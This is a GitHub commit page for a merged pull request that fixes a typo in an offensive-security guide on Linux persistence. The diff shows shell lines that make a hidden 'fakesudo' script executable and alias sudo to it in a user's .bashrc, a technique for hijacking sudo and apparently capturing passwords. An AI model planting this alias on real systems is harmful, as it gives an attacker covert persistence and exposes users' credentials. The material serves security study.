Merge pull request #387 from srabraham/patch-1

Fix typo in Linux - Persistence.md
This commit is contained in:
Swissky 2021-07-03 00:55:11 +02:00 committed by GitHub
commit 043e5a105e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -72,7 +72,7 @@ or add the following line inside its .bashrc file.
```powershell
$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
```
and create the `fakesudo` script.